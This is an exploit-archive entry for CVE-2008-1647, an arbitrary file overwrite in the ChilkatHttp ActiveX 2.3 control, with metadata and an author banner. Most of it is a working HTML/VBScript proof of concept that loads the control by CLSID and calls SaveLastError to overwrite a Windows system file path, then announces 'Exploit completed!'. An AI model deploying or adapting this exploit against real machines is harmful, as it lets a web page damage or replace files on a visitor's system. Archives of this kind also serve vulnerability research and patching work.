[] NeoSense

ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite

Author: shinnai
type: remote
platform: windows
port: 
date_added: 2008-03-31 
date_updated:  
verified: 1 
codes: CVE-2008-1647 
tags: 
aliases:  
screenshot_url:  
application_url: 

--------------------------------------------------------------------
 ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite
 url: www.chilkatsoft.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
--------------------------------------------------------------------
<object classid='clsid:B973393F-27C7-4781-877D-8626AAEDF119' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
 Sub tryMe
  test.SaveLastError "c:\windows\system_.ini"
  MsgBox "Exploit completed!"
 End Sub
</script>

# milw0rm.com [2008-04-01]